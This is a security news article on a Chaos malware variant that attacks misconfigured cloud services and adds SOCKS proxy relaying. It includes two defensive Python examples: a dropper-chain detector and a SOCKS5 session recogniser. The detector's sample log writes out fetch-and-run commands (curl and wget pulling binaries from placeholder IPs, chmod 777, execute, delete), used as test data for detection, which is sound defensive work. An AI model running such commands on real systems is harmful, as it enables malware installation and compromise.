Cybersecurity researchers have identified a new version of the Chaos malware that is now actively targeting poorly secured cloud environments. This marks a shift from its earlier focus on routers and edge devices to more complex cloud-based infrastructure.
According to recent findings, the updated variant is taking advantage of misconfigured services, showing how attackers are adapting their tools to match modern enterprise environments.
From Edge Devices to Cloud Targets
Chaos was first observed in 2022 as a cross-platform threat capable of infecting both Windows and Linux systems. It was designed to:
- Execute remote shell commands
- Spread across systems using SSH brute-force techniques
- Deploy additional malicious modules
- Mine cryptocurrency
- Launch DDoS attacks using multiple protocols
The malware is believed to have evolved from an earlier threat known as Kaiji, which primarily targeted exposed Docker environments.

How the New Attack Works
In recent activity, researchers detected the updated Chaos variant targeting a deliberately vulnerable Hadoop server used for testing. The attack began with a crafted HTTP request that allowed the attacker to deploy a malicious application.
This application executed a chain of shell commands to:
- Download the Chaos binary from a remote server
- Change file permissions to allow full access (chmod 777)
- Run the malware
- Remove traces of the file to avoid detection
This approach helps attackers maintain stealth while quickly establishing control over the compromised system. Deleting the binary after launch does not end the infection, however: on Linux the process keeps running, and its executable can still be recovered from /proc/<pid>/exe while the process lives, so responders should capture it before terminating the process.
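As an added illustration (not code from the researchers' report), the following Python script shows how a defender could spot this four-step dropper pattern in process-execution telemetry and rank it by how many of the steps are present. The log records, file paths and IP addresses are constructed for the example; a real deployment would feed it execve events from auditd or an EDR agent.

```python
"""Flag the download -> chmod -> execute -> delete dropper pattern in process logs.

Added example, not code from the report: the events below are constructed
execve-style records ("<epoch> <pid> <cmdline>") modelled on what auditd or an
EDR agent emits, and the IP addresses are documentation-range addresses.
"""
import re
from dataclasses import dataclass, field

SAMPLE_EVENTS = """\
1000 4101 /bin/sh -c whoami
1001 4102 curl -fsSL http://198.51.100.23/chaos -o /tmp/.x
1002 4103 chmod 777 /tmp/.x
1003 4104 /tmp/.x
1004 4105 rm -f /tmp/.x
1100 4201 wget -q http://203.0.113.9/dl.sh -O /var/tmp/dl.sh
1101 4202 chmod 755 /var/tmp/dl.sh
1102 4203 /bin/bash /var/tmp/dl.sh
2000 4301 curl -s https://monitor.internal/health
"""

# curl writes to -o/--output; wget writes to -O/--output-document (wget's -o is its log file).
CURL_RE = re.compile(r"\bcurl\b.*?\s(?:-o|--output)\s+(\S+)")
WGET_RE = re.compile(r"\bwget\b.*?\s(?:-O|--output-document)\s+(\S+)")
CHMOD_RE = re.compile(r"\bchmod\s+(?:-\S+\s+)*(\S+)\s+(\S+)")
RM_RE = re.compile(r"\brm\b(?:\s+-\S+)*\s+(\S+)")
SHELLS = {"sh", "bash", "dash", "/bin/sh", "/bin/bash", "/usr/bin/bash", "/bin/dash"}


@dataclass
class DropperChain:
    path: str
    first_ts: int
    stages: list = field(default_factory=list)

    def add(self, stage):
        if stage not in self.stages:
            self.stages.append(stage)


def downloaded_path(cmd):
    """Path a curl/wget command writes to, or None if it writes nowhere we can name."""
    m = CURL_RE.search(cmd) or WGET_RE.search(cmd)
    return m.group(1) if m else None


def executed_path(cmd, known):
    """Return a known dropped path if this command runs it directly or via a shell."""
    tokens = cmd.split()
    if not tokens:
        return None
    if tokens[0] in known:
        return tokens[0]
    if tokens[0] in SHELLS and len(tokens) > 1 and tokens[1] in known:
        return tokens[1]
    return None


def detect_dropper_chains(events_text, window=600):
    """Return chains that were both fetched and executed within `window` seconds."""
    chains = {}
    for line in events_text.splitlines():
        if not line.strip():
            continue
        ts, _pid, cmd = line.split(maxsplit=2)
        ts = int(ts)
        target = downloaded_path(cmd)
        if target:
            chains[target] = DropperChain(path=target, first_ts=ts, stages=["download"])
            continue
        # Only chains still inside the time window may absorb later events.
        live = {p: c for p, c in chains.items() if ts - c.first_ts <= window}
        m = CHMOD_RE.search(cmd)
        if m and m.group(2) in live:
            live[m.group(2)].add(f"chmod:{m.group(1)}")
            continue
        path = executed_path(cmd, live)
        if path:
            live[path].add("execute")
            continue
        m = RM_RE.search(cmd)
        if m and m.group(1) in live:
            live[m.group(1)].add("delete")
    return [c for c in chains.values() if {"download", "execute"} <= set(c.stages)]


def severity(chain):
    """The full pattern is fetch, world-rwx mode, execution and deletion of the file."""
    if "execute" in chain.stages and "chmod:777" in chain.stages and "delete" in chain.stages:
        return "high"
    if "execute" in chain.stages:
        return "medium"
    return "low"


if __name__ == "__main__":
    for c in detect_dropper_chains(SAMPLE_EVENTS):
        print(f"{severity(c):6} {c.path}: {' -> '.join(c.stages)}")
```

The health-check curl at the end is never flagged because it writes no file; the second chain is reported at lower severity because it used chmod 755 and left the script on disk.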
Connection to Previous Campaigns
The domain used to host the malware has reportedly been linked to earlier cyber operations, including phishing campaigns associated with a group known as Silver Fox. Those campaigns previously delivered decoy documents and remote access malware, suggesting possible overlap in infrastructure or tactics.

What’s New in This Variant
The latest version of Chaos introduces several changes:
- Removal of older propagation methods, such as SSH spreading and router exploitation
- Code restructuring, indicating the malware has been rewritten or heavily modified
- New SOCKS proxy functionality, allowing infected systems to route malicious traffic
The proxy feature is the most significant change. It lets attackers route their traffic through compromised machines, so that activity appears to originate from the victim's address rather than the attacker's own, which makes detection and attribution more difficult.
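To make the proxy point concrete, here is an added Python example (not from the report or the malware) that recognises the SOCKS5 handshake defined in RFC 1928 in captured TCP payloads, so that a server which suddenly starts answering SOCKS5 method-selection requests can be flagged as a relay. The session payloads and host addresses are constructed for illustration, and the example assumes the server selected the no-authentication method, so the client's request follows its greeting directly.

```python
"""Recognise SOCKS5 (RFC 1928) sessions in captured TCP payloads.

Added example for spotting a host that has started acting as a proxy. The
payload bytes and addresses below are constructed for illustration and are
not a capture from the reported campaign.
"""
import ipaddress
import struct

SOCKS_VERSION = 0x05
NO_ACCEPTABLE_METHODS = 0xFF
CMD_NAMES = {0x01: "CONNECT", 0x02: "BIND", 0x03: "UDP_ASSOCIATE"}


def _need(data, off, n):
    if len(data) < off + n:
        raise ValueError(f"truncated SOCKS5 message at offset {off}")


def parse_socks5_client(data: bytes) -> dict:
    """Parse the client side of a SOCKS5 session: the method greeting
    (VER NMETHODS METHODS) followed by the request (VER CMD RSV ATYP DST.ADDR DST.PORT).
    Assumes the server chose method 0x00 (no auth), so no sub-negotiation sits between them.
    Raises ValueError if the bytes are not a well-formed SOCKS5 exchange."""
    _need(data, 0, 2)
    if data[0] != SOCKS_VERSION:
        raise ValueError("not a SOCKS5 greeting")
    nmethods = data[1]
    _need(data, 2, nmethods)
    methods = list(data[2:2 + nmethods])
    off = 2 + nmethods
    _need(data, off, 4)
    if data[off] != SOCKS_VERSION or data[off + 2] != 0x00:
        raise ValueError("malformed request header")
    cmd, atyp = data[off + 1], data[off + 3]
    off += 4
    if atyp == 0x01:  # IPv4, 4 octets
        _need(data, off, 4)
        host, off = str(ipaddress.IPv4Address(data[off:off + 4])), off + 4
    elif atyp == 0x04:  # IPv6, 16 octets
        _need(data, off, 16)
        host, off = str(ipaddress.IPv6Address(data[off:off + 16])), off + 16
    elif atyp == 0x03:  # domain name with 1-byte length prefix
        _need(data, off, 1)
        n = data[off]
        _need(data, off + 1, n)
        host, off = data[off + 1:off + 1 + n].decode("ascii"), off + 1 + n
    else:
        raise ValueError(f"unknown ATYP {atyp:#x}")
    _need(data, off, 2)
    (port,) = struct.unpack("!H", data[off:off + 2])
    return {"methods": methods, "command": CMD_NAMES.get(cmd, f"{cmd:#x}"), "host": host, "port": port}


def socks5_server_accepted(reply: bytes) -> bool:
    """True if the server's method-selection reply (VER METHOD) accepted some auth method."""
    return len(reply) >= 2 and reply[0] == SOCKS_VERSION and reply[1] != NO_ACCEPTABLE_METHODS


# Constructed sessions: two SOCKS5 relays on an internal host and one ordinary HTTP exchange.
SESSIONS = [
    {"server": "10.0.5.12", "dport": 1080,
     "client": b"\x05\x01\x00" + b"\x05\x01\x00\x01" + bytes([203, 0, 113, 10]) + b"\x01\xbb",
     "reply": b"\x05\x00"},
    {"server": "10.0.5.12", "dport": 9050,
     "client": b"\x05\x02\x00\x02" + b"\x05\x01\x00\x03" + b"\x0bexample.com" + b"\x00\x50",
     "reply": b"\x05\x00"},
    {"server": "10.0.5.13", "dport": 80,
     "client": b"GET / HTTP/1.1\r\nHost: app.internal\r\n\r\n",
     "reply": b"HTTP/1.1 200 OK\r\n\r\n"},
]


def find_proxy_sessions(sessions):
    """Report every session in which the server completed a SOCKS5 handshake and was asked to relay."""
    findings = []
    for s in sessions:
        if not socks5_server_accepted(s["reply"]):
            continue
        try:
            req = parse_socks5_client(s["client"])
        except ValueError:
            continue
        findings.append({"proxy_host": s["server"], "proxy_port": s["dport"],
                         "command": req["command"], "relayed_to": f"{req['host']}:{req['port']}"})
    return findings


if __name__ == "__main__":
    for f in find_proxy_sessions(SESSIONS):
        print(f"{f['proxy_host']}:{f['proxy_port']} {f['command']} -> {f['relayed_to']}")
```

Checking the server's reply as well as the client's greeting matters: a scanner probing for open proxies will send the greeting to many hosts, but only a host that answers with a chosen method is actually offering the service.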
Why This Matters
The addition of proxy capabilities suggests that attackers are expanding how they monetize botnets. Instead of relying only on DDoS attacks or crypto mining, they can now:
- Sell proxy access
- Support anonymized cyber operations
- Provide infrastructure for other threat actors
This reflects a broader trend where botnets are evolving into multi-purpose platforms within the cybercrime ecosystem.

Final Insight
Although Chaos is not a new threat, its continued development shows how quickly cybercriminal tools can adapt. The shift toward cloud environments and proxy-based services highlights a growing risk for organizations that leave systems misconfigured or exposed.
For defenders, this is a reminder that securing cloud services and monitoring unusual activity is just as important as protecting traditional endpoints.

